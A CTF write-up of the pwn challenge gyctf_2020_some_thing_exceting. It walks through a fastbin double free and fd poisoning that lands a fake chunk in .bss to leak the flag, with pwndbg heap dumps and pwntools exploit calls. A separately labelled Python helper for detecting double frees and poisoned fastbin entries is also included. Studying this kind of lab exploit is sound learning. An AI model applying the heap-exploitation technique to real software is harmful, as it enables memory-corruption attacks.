
gyctf_2020_some_thing_exceting: detailed walkthrough

Another challenge from the university campaign (高校战役), and one I had done before, but back then I was too weak (tcl) and could not even reproduce it; I am still pretty bad now.

So I am writing a fresh article here to record it.

Program flow

[image: image-20210501212850010]

init

The program first enters the init function.

init starts by reading the flag into memory.

It then copies the flag data from that memory into s, which lives at 0x6020a8.

Because 0x6020a0 holds the value 0x60 (a valid fastbin size field), a fake chunk can be allocated there; reading that chunk's data then yields the flag.

[image: image-20210501213125204]

Functions

  1. create: creates a pointer chunk that holds the addresses of two blocks, ba and na; then creates ba and na with sizes from 0 to 0x70, i.e. within fastbin range.
  2. delete: frees the blocks but does not clear the pointers, so a double free is possible, which gives a degree of read/write at chosen addresses.
  3. view: prints the contents by idx.

Exploitation

  1. create twice
  2. free(0) -> free(1) -> free(0)
  3. create again to get 2; now write 2's content: since 0 and 2 are the same address, writing 2 rewrites 0's content, so when 4 is later allocated it lands on the desired address
  4. set 2's content to 0x6020a0-0x8
  5. create 3, create 4
  6. 4 is thus allocated at 0x6020a0; printing its contents gives the flag

Detailed walkthrough

0. Protections

PIE is not enabled.

winter@ubuntu:~/buu$ checksec gyctf_2020_some_thing_exceting 
[*] '/home/winter/buu/gyctf_2020_some_thing_exceting'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

1. Create twice

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xf74000
Size: 0x231

Allocated chunk | PREV_INUSE
Addr: 0xf74230
Size: 0x1011

Allocated chunk | PREV_INUSE
Addr: 0xf75240
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0xf75260
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0xf752c0
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0xf75320
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0xf75340
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0xf753a0
Size: 0x61

Top chunk | PREV_INUSE
Addr: 0xf75400
Size: 0x1fc01
pwndbg> bins
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
create(0x50,'aaaa',0x50,'bbbb')
create(0x50,'aaaa',0x50,'bbbb')

2. Double free

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x10ac000
Size: 0x231

Allocated chunk | PREV_INUSE
Addr: 0x10ac230
Size: 0x1011

Free chunk (fastbins) | PREV_INUSE
Addr: 0x10ad240
Size: 0x21
fd: 0x10ad320

Allocated chunk | PREV_INUSE
Addr: 0x10ad260
Size: 0x61

Free chunk (fastbins) | PREV_INUSE
Addr: 0x10ad2c0
Size: 0x61
fd: 0x10ad3a0

Free chunk (fastbins) | PREV_INUSE
Addr: 0x10ad320
Size: 0x21
fd: 0x10ad240

Free chunk (fastbins) | PREV_INUSE
Addr: 0x10ad340
Size: 0x61
fd: 0x10ad2c0

Free chunk (fastbins) | PREV_INUSE
Addr: 0x10ad3a0
Size: 0x61
fd: 0x10ad340

Top chunk | PREV_INUSE
Addr: 0x10ad400
Size: 0x1fc01
pwndbg> bins
fastbins
0x20: 0x10ad240 —▸ 0x10ad320 ◂— 0x10ad240
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x10ad2c0 —▸ 0x10ad3a0 —▸ 0x10ad340 ◂— 0x10ad2c0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
delete(0)
delete(1)
delete(0)

3. create 3, and change fd to the fake chunk

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0xce5000
Size: 0x231

Allocated chunk | PREV_INUSE
Addr: 0xce5230
Size: 0x1011

Free chunk (fastbins) | PREV_INUSE
Addr: 0xce6240
Size: 0x21
fd: 0xce62d0

Allocated chunk | PREV_INUSE
Addr: 0xce6260
Size: 0x61

Free chunk (fastbins) | PREV_INUSE
Addr: 0xce62c0
Size: 0x61
fd: 0x602098

Free chunk (fastbins) | PREV_INUSE
Addr: 0xce6320
Size: 0x21
fd: 0xce6240

Free chunk (fastbins) | PREV_INUSE
Addr: 0xce6340
Size: 0x61
fd: 0xce62c0

Allocated chunk | PREV_INUSE
Addr: 0xce63a0
Size: 0x61

Top chunk | PREV_INUSE
Addr: 0xce6400
Size: 0x1fc01
pwndbg> bins
fastbins
0x20: 0xce6320 —▸ 0xce6240 —▸ 0xce62d0 ◂— 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0xce6340 —▸ 0xce62c0 —▸ 0x602098 ◂— 'flag{winter_excited}'
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
fake_chunk = 0x6020a0 - 0x8
create(0x50,p64(fake_chunk),0x50,p64(fake_chunk))#2
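As an added analysis example (not part of the original write-up), a small Python helper that reads the pwndbg fastbin chains shown in steps 2 and 3 and flags what a heap-forensics pass would: an address repeated inside one chain (the double free) and a chain entry outside the heap mapping (the fd poisoned to 0x602098 in .bss); it also checks glibc's fastbin size-index rule that makes the 0x60 at 0x6020a0 acceptable as a fake chunk. The heap bounds are assumed from the heap dumps (heap base up to the end of the top chunk).

```python
"""Heap-forensics helper for pwndbg-style fastbin chain lines (added example).
Flags an address repeating in one chain (double free) and a chain entry
outside the heap mapping (poisoned fd), and checks whether a fake chunk's
size field passes glibc's fastbin index check (why 0x60 at 0x6020a0 matters)."""
import re

# Sample lines copied from the write-up's pwndbg output (steps 2 and 3);
# heap bounds used with them are assumed from the heap dumps (base to end of top chunk).
SAMPLE_DOUBLE_FREE = """\
0x20: 0x10ad240 —▸ 0x10ad320 ◂— 0x10ad240
0x30: 0x0
0x60: 0x10ad2c0 —▸ 0x10ad3a0 —▸ 0x10ad340 ◂— 0x10ad2c0
"""
SAMPLE_POISONED = """\
0x20: 0xce6320 —▸ 0xce6240 —▸ 0xce62d0 ◂— 0x0
0x60: 0xce6340 —▸ 0xce62c0 —▸ 0x602098 ◂— 'flag{winter_excited}'
"""
HEX = re.compile(r"0x[0-9a-fA-F]+")

def parse_fastbins(text):
    """Map each fastbin size to the list of chunk addresses in its chain."""
    bins = {}
    for line in text.splitlines():
        m = re.match(r"\s*(0x[0-9a-fA-F]+):\s*(.*)", line)
        if m:
            chain = [int(a, 16) for a in HEX.findall(m.group(2))]
            bins[int(m.group(1), 16)] = [a for a in chain if a != 0]
    return bins

def audit_fastbins(text, heap_lo, heap_hi):
    """Return findings for chain cycles and entries outside [heap_lo, heap_hi)."""
    findings = []
    for size, chain in parse_fastbins(text).items():
        seen = set()
        for addr in chain:
            if addr in seen:
                findings.append(f"0x{size:x}: 0x{addr:x} appears twice (double free)")
                break  # the chain loops from here on
            seen.add(addr)
            if not heap_lo <= addr < heap_hi:
                findings.append(f"0x{size:x}: 0x{addr:x} is outside the heap (poisoned fd)")
    return findings

def fastbin_index(chunk_size):
    """glibc's fastbin_index on 64-bit: (size >> 4) - 2."""
    return (chunk_size >> 4) - 2

def fake_chunk_accepted(bin_size, size_field):
    """malloc aborts unless the victim's masked size maps to the bin it came from."""
    return fastbin_index(size_field & ~0x7) == fastbin_index(bin_size)
```

Run audit_fastbins on the step 2 dump with bounds 0x10ac000..0x10cd000 to see both cycles reported, and on the step 3 dump with bounds 0xce5000..0xd06000 to see the .bss entry flagged.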

4. create 4, create 5 (allocated at the fake address)

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x652000
Size: 0x231

Allocated chunk | PREV_INUSE
Addr: 0x652230
Size: 0x1011

Allocated chunk | PREV_INUSE
Addr: 0x653240
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x653260
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0x6532c0
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0x653320
Size: 0x21

Allocated chunk | PREV_INUSE
Addr: 0x653340
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0x6533a0
Size: 0x61

Allocated chunk | PREV_INUSE
Addr: 0x653400
Size: 0x81

Top chunk | PREV_INUSE
Addr: 0x653480
Size: 0x1fb81
pwndbg> bins
fastbins
0x20: 0x6532d0 ◂— 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x6e69777b67616c66 ('flag{win')
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> x/30gx 0x6020a0-8
0x602098: 0x0000000000000000 0x0000000000000060
0x6020a8: 0x6e69777b67610a61 0x696378655f726574
0x6020b8: 0x000000007d646574 0x0000000000000000
pwndbg> x/30s 0x6020a0-8
0x602098: ""
0x602099: ""
0x60209a: ""
0x60209b: ""
0x60209c: ""
0x60209d: ""
0x60209e: ""
0x60209f: ""
0x6020a0: "`"
0x6020a2: ""
0x6020a3: ""
0x6020a4: ""
0x6020a5: ""
0x6020a6: ""
0x6020a7: ""
0x6020a8: "a\nag{winter_excited}"
create(0x50,p64(fake_chunk),0x50,p64(fake_chunk))#2
create(0x50,'a',0x70,'a')#2

5. Print 4

[DEBUG] Received 0xac bytes:
"# Banana's ba is a\n"
'ag{winter_excited}\n'
"# Banana's na is a\n"
view(4)
p.recv()

My earlier write-up: i春秋 New Year campaign PWN: Some_thing_exceting
